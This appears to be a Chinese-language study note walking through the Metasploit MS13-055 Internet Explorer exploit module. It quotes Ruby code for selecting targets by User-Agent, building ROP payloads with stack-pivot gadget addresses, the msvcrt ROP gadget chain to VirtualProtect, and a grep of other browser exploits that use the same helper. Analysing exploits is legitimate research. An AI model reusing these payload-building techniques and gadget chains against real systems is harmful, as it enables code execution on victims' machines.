111 def get_payload(t) 112 if t['Rop'] == :msvcrt 113 print_status("Using msvcrt ROP") 114 esp_align = "x81xc4x54xf2xffxff" 115 rop_dll = 'msvcrt' 116 opts = {'target'=>'xp'} 117 else 118 print_status("Using JRE ROP") 119 esp_align = "x81xECxF0xD8xFFxFF" # sub esp, -10000 120 rop_dll = 'java' 121 opts = {} 122 end
daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254
daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel 00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0
esp_align代表的汇编语句的作用是对齐esp,即栈指针。
87 def get_target(agent) 88 return target if target.name != 'Automatic' 89 90 nt = agent.scan(/Windows NT (d.d)/).flatten[0] || '' 91 ie = agent.scan(/MSIE (d)/).flatten[0] || '' 92 93 ie_name = "IE #{ie}" 94 95 case nt 96 when '5.1' 97 os_name = 'Windows XP SP3' 98 when '6.1' 99 os_name = 'Windows 7' 100 end 101 102 targets.each do |t| 103 if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) 104 return t 105 end 106 end 107 108 nil 109 end
188 def on_request_uri(cli, request) 189 agent = request.headers['User-Agent'] 190 t = get_target(agent)
当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来
返回与版本相关的数据
52 'Targets' => 53 [ 54 [ 'Automatic', {} ], 55 [ 56 'IE 8 on Windows XP SP3', 57 { 58 'Rop' => :msvcrt, 59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret 60 'Align' => 0x77c4d801 # add esp, 0x2c; ret 61 } 62 ], 63 [ 64 'IE 8 on Windows 7', 65 { 66 'Rop' => :jre, 67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret 68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret 69 } 70 ] 71 ],
如果当前的系统不支持,就会返回404页面。
111 def get_payload(t) 112 if t['Rop'] == :msvcrt 113 print_status("Using msvcrt ROP") 114 esp_align = "x81xc4x54xf2xffxff" 115 rop_dll = 'msvcrt' 116 opts = {'target'=>'xp'} 117 else 118 print_status("Using JRE ROP") 119 esp_align = "x81xECxF0xD8xFFxFF" # sub esp, -10000 120 rop_dll = 'java' 121 opts = {} 122 end 123 124 p = esp_align + payload.encoded + rand_text_alpha(12000) 125 generate_rop_payload(rop_dll, p, opts) 126 end
generate_rop_payload
77 def generate_rop_payload(rop, payload, opts={}) 78 nop = opts['nop'] || nil 79 badchars = opts['badchars'] || '' 80 pivot = opts['pivot'] || '' 81 target = opts['target'] || '' 82 base = opts['base'] || nil 83 84 rop = select_rop(rop, {'target'=>target, 'base'=>base}) 85 # Replace the reserved words with actual gadgets 86 rop = rop.map {|e| 87 if e == :nop 88 sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090 89 elsif e == :junk 90 Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i 91 elsif e == :size 92 payload.length 93 elsif e == :unsafe_negate_size 94 get_unsafe_size(payload.length) 95 elsif e == :safe_negate_size 96 get_safe_size(payload.length) 97 else 98 e 99 end 100 }.pack("V*") 101 102 raise RuntimeError, "No ROP chain generated successfully" if rop.empty? 103 104 return pivot + rop + payload 105 end
会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。
3 <rop> 4 <compatibility> 5 <target>WINDOWS XP SP2</target> 6 <target>WINDOWS XP SP3</target> 7 </compatibility> 8 9 <gadgets base="0x77c10000"> 10 <gadget offset="0x0002b860">POP EAX # RETN</gadget> 11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget> 12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget> 13 <gadget value="junk">JUNK</gadget> 14 <gadget offset="0x0001362c">POP EBX # RETN</gadget> 15 <gadget offset="0x0004d9bb">Writable location</gadget> 16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget> 17 <gadget offset="0x00040d13">POP EDX # RETN</gadget> 18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget> 19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget> 20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget> 21 <gadget value="junk">JUNK</gadget> 22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget> 23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget> 24 <gadget offset="0x0002ee15">skip 4 bytes</gadget> 25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget> 26 <gadget offset="0x0004d9bb">Writable location</gadget> 27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget> 28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget> 29 <gadget offset="0x0002a184">POP ESI # RETN</gadget> 30 <gadget offset="0x0001aacc">JMP [EAX]</gadget> 31 <gadget offset="0x0002b860">POP EAX # RETN</gadget> 32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget> 33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget> 34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget> 35 </gadgets> 36 </rop>
在查找Windows下Browser相关的ROP漏洞
daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target}) adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot}) adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot}) adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot}) adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded) adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'}) adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'}) apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'}) apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'}) crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")}) hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'}) ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'}) ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code) ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'}) ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'}) ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code) ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' }) ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' }) indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'}) mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'}) ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p) ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p) ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '') ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'}) ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot}) ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot}) ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts) ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot}) ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'}) ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot}) ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot}) ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot}) ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot}) ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup}) msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust}) msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust}) novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'}) ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code) quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'}) vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)